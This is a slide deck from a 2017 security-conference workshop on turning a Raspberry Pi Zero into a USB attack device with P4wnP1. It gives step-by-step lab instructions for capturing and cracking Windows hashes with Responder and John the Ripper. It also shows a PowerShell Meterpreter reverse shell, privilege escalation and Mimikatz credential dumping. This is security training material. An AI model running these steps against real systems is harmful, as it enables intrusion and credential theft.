Weaponizing the Raspberry Pi Zero

Black Hat Sessions XV

Welcome!

28/06/2017 2

Niels VonkSecurity Consultant

Vestdijk 595611 CA Eindhoven

E-mail: niels@madison-gurkha.comTel: 06 – 5751 6677

Ben BrückerSecurity Consultant

Vestdijk 595611 CA Eindhoven

E-mail: ben@madison-gurkha.comTel: 06 – 2694 9189

Agenda

• Latest attack platforms

• The Raspberry Pi Zero

• Various attack methods

• Demo 1 – Responder

• Demo 2 – Meterpreter

28/06/2017 3

Hardware attack platforms

28/06/2017 4

Attack vectors

28/06/2017 5

HID attacks

• Attack started to get popular around 2010

• Main development by Andrian Crenshaw (IronGeek), Darren Kitchen (Hak5) and Dave Kennedy (TrustedSec)

• Allows attackers to interface with systems as a keyboard

• Plug-and-Play for known OS

28/06/2017 6

Network interface attacks

• Attached as USB device acts as an network interface

• Installation without user interaction

• Hi-jacks priority via metrics

• Ability to launch network based attacks

28/06/2017 7

The almighty Raspberry Pi Zero W

• 1GHz, single-core CPU

• 512MB RAM

• Mini HDMI and USB On-The-Go ports

• Micro USB power

• 802.11 b/g/n wireless LAN

• Bluetooth 4.1

• Bluetooth Low Energy (BLE)

28/06/2017 8

P4wnP1

• Developed by Marcus Mengs (MaMe82)• https://github.com/mame82/P4wnP1

• Transforms a cheap Pi into a complete attack platform

• Support for:• HID attacks

• Network attacks

• Data transfers

• Cross interaction between Pi and target

28/06/2017 9

P4wnP1 – Network attack

• For Windows targets it will act as a RNDIS interface

• For Linux/Mac targets it will act as a CDC ECM interface

• Creates priority via metrics of the interfaces

28/06/2017 10

P4wnP1 - HID attack

• Plug-and-play installation posing as keyboard

• Ability to change the PID and VID for whitelist bypassing

• Can write exploits/backdoors on the target via the keyboard

• Allows in memory execution via PowerShell

28/06/2017 11

Demo non-tech guide

• Login to the Pi via Secure Shell Protocol (SSH)

• Edit the configuration file to select the correct payload

• Plug the Pi into the target via the USB port

• Wait and see the payload execute

• Retrieve the Pi

• Power on the Pi and login to the Pi via Secure Shell Protocol (SSH)

• Inspect your loot

• Crack the hash to retrieve the password

28/06/2017 12

Responder attacks

28/06/2017 13

Demo 1 - Responder

• P4wnP1 will install itself as a network device

• P4wnP1 will give an IP address to the target

• Routes will be set to redirect traffic to the P4wnP1

• Responder will start on the P4wnP1

• Client will try to connect to a non-existing share

• Responder will capture the authentication hash

• Win!

28/06/2017 14

Demo 1 – Responder (prep)

• Use PuTTY to SSH into your Pi• IP address of your Pi = 192.168.1.1<number on your Pi>

• Edit the setup file using the command:• nano ~/P4wnP1/setup.cfg

• and make sure that the line with PAYLOAD=responder is not commented out. (PAYLOAD=responder instead of #PAYLOAD=responder)

• Save the file via the following hotkey:• CTRL+X Y ENTER

• Inspect the payload using the command • nano ~/P4wnP1/payloads/responder

• Attach the P4wnP1 via the USB port to the target

28/06/2017 15

Demo 1 – Responder (action)

• Use PuTTY to SSH into your Pi• IP address of your Pi = 192.168.1.1<number on your Pi>

• Run the following commando to see Responder:• sudo screen –x

• Inspect behaviour and verify the payload has executed

• Exit the screen session using:• CTRL+A D

28/06/2017 16

Demo 1 – Responder (P4wn)

• Now we are going to crack the retrieved hash via the following command:• /home/pi/P4wnP1/crack_last_responder.sh

• This command will run John the Ripper versus a wordlist to retrieve the password

• Win!

28/06/2017 17

Demo non-tech guide

• Login to the Pi via Secure Shell Protocol (SSH)

• Edit the configuration file to select the correct payload

• Create malicious code

• Insert created code in the payload

• Plug the Pi into the target via the USB port

• Wait and see the payload execute

• Retrieve the Pi

• Interact with the target via a remote connection that is create via the malicious code

28/06/2017 18

Meterpreter attack

• Generate malicious code on attack machine

• Deliver this code via various methods on the target

• This code will run on the target machine and connect back to the attacker thus bypassing ingress firewall filtering

• Via this tunnel we can interact and execute command on the target machine

28/06/2017 19

Demo 2 - Meterpreter

• P4wnP1 will install itself as a HID device

• Upon installation of the drivers the payload will be executed

• Script will start a shell with admin privileges

• The Meterpreter payload will be typed out as an base64 encoded string

• Powershell will decode the base64 string and execute in memory

• Creates a reverse_tcp shell to MSF listener

• Win!

28/06/2017 20

Demo 2 - Meterpreter (prep)

• Use PuTTY to SSH into your Pi• IP address of your Pi = 192.168.1.1<number on your Pi>

• Edit the setup file via the command:• nano ~/P4wnP1/setup.cfg

• and make sure that the line with PAYLOAD=meterpreter is not commented out. • (PAYLOAD=meterpreter instead of #PAYLOAD=meterpreter)

• Save the fle via the following hotkey:• CTRL+X Y

• Inspect the payload via the command • nano ~/P4wnP1/payloads/meterpreter

28/06/2017 21

Demo 2 - Meterpreter (prep)

• Use PuTTY to SSH into the Metasploit server• IP address of the Metasploit server = 192.168.1.100

• Run the following command to generate a payload:• bash payload_generator.sh

• Copy the output starting at:• %COMSPEC% /b /c start /b /min powershell.exe

• Now we are going to replace the old payload in the meterpreterfile on the Pi• nano ~/P4wnP1/payloads/meterpreter

• Search for the line starting with:• STRING %COMSPEC% /b /c start

28/06/2017 22

Demo 2 - Meterpreter (prep)

• Remove this line via the following hotkey• CTRL+K

• Paste the payload by clicking the right mouse button

• Save the file via the following hotkey:• CTRL+X Y

28/06/2017 23

Demo 2 - Meterpreter (prep)

• Now back on the Metasploit server run the following command:• msfconsole –r msf_receiver.rc

• This will start the Meterpreter handler to receive incoming connections

• Attach the P4wnP1 via the USB port to the target

28/06/2017 24

Demo 2 - Meterpreter (action)

• The script will create an elevated Powershell session

• The payload will be typed out by the Pi

• Upon activation a new session should appear on the MSF server

• Access the session via the command:• sessions –i <id>

28/06/2017 25

Demo 2 - Meterpreter (P4wn)

• Now that we have a interactive shell lets see what we can do

• Run the command getuid to retrieve the current user

• Get SYSTEM privileges with getsystem

• We can now dump the password hashes with hashdump

• But wait! We not dump them plain text ☺

• Run load kiwi to start the newest version of Mimikatz• Now execute the command creds_all

28/06/2017 26

28/06/2017 27

Questions?

28/06/2017 28

Other usages

• Malware installation on airgapped systems

• Extraction of files from target computer

• Pivot into internal networks

• Man-in-the-Middle attacks

28/06/2017 29

Future plans

• Let the P4wnP1 connect to your mobile devices over WiFi/Bluetooth from real-time access and interaction

• Create new samples for the payload

• More advanced staged exploits that will create a permanent foothold in the network

28/06/2017 30